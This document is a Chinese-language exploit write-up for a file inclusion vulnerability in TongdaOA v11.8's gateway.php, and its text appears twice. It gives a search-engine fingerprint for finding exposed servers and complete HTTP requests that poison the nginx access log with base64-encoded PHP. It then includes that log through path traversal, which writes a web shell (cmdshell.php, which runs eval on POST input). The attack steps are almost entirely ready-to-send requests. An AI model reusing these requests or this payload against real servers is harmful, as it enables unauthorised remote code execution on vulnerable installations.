TongdaOA v11.8 getway.php 远程文件包含漏洞

# TongdaOA v11.8 getway.php 远程文件包含漏洞 ## 漏洞描述 TongdaOA v11.8 getway.php 存在文件包含漏洞，攻击者通过发送恶意请求包含日志文件导致任意文件写入漏洞 ## 漏洞影响...

TongdaOA v11.8 getway.php 远程文件包含漏洞
==================================

漏洞描述
----

TongdaOA v11.8 getway.php 存在文件包含漏洞，攻击者通过发送恶意请求包含日志文件导致任意文件写入漏洞

漏洞影响
----

TongdaOA v11.8

网络测绘
----

app="TDXK-TongdaOA"

漏洞复现
----

登陆页面

![img](https://oss-yg-cztt.yun.qianxin.com/butian-public/f317564b52b03f3579814645e294c7bc44a502af5ee76.jpg)

发送恶意请求让日志被记录

```php
GET /d1a4278d?json={}&aa=<?php @fputs(fopen(base64_decode('Y21kc2hlbGwucGhw'),w),base64_decode('PD9waHAgQGV2YWwoJF9QT1NUWydjbWRzaGVsbCddKTs/Pg=='));?> HTTP/1.1
Host: 
User-Agent: Go-http-client/1.1
Accept-Encoding: gzip
```

![img](https://oss-yg-cztt.yun.qianxin.com/butian-public/f707015d8051895bfc600ba77c8ec4649c73839bbdb70.jpg)

在通过漏洞包含日志文件

```php
POST /ispirit/interface/gateway.php HTTP/1.1
Host: 
User-Agent: Go-http-client/1.1
Content-Length: 54
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

json={"url":"/general/../../nginx/logs/oa.access.log"}
```

![img](https://oss-yg-cztt.yun.qianxin.com/butian-public/f1070475269309e33349019927b564e7a22bdbfb1673b.jpg)

再次发送恶意请求写入文件

```php
POST /mac/gateway.php HTTP/1.1
Host: 
User-Agent: Go-http-client/1.1
Content-Length: 54
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

json={"url":"/general/../../nginx/logs/oa.access.log"}
```

![img](https://oss-yg-cztt.yun.qianxin.com/butian-public/f9648878b49dd31607b2c84caeed98d8a73c1cd523272.jpg)

访问写入的文件 `/mac/cmdshell.php`

![img](https://oss-yg-cztt.yun.qianxin.com/butian-public/f1645204003b4f1ed814c77fa698280b1d37fe420dc65.jpg)

TongdaOA v11.8 getway.php 远程文件包含漏洞

漏洞描述

TongdaOA v11.8 getway.php 存在文件包含漏洞，攻击者通过发送恶意请求包含日志文件导致任意文件写入漏洞

漏洞影响

TongdaOA v11.8

网络测绘

app="TDXK-TongdaOA"

漏洞复现

登陆页面

发送恶意请求让日志被记录

GET /d1a4278d?json={}&aa=<?php @fputs(fopen(base64_decode('Y21kc2hlbGwucGhw'),w),base64_decode('PD9waHAgQGV2YWwoJF9QT1NUWydjbWRzaGVsbCddKTs/Pg=='));?> HTTP/1.1
Host: 
User-Agent: Go-http-client/1.1
Accept-Encoding: gzip

在通过漏洞包含日志文件

POST /ispirit/interface/gateway.php HTTP/1.1
Host: 
User-Agent: Go-http-client/1.1
Content-Length: 54
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

json={"url":"/general/../../nginx/logs/oa.access.log"}

再次发送恶意请求写入文件

POST /mac/gateway.php HTTP/1.1
Host: 
User-Agent: Go-http-client/1.1
Content-Length: 54
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

json={"url":"/general/../../nginx/logs/oa.access.log"}

访问写入的文件 /mac/cmdshell.php

发表于 2024-07-12 18:44:35
阅读 ( 2158 )
分类：OA产品

站长统计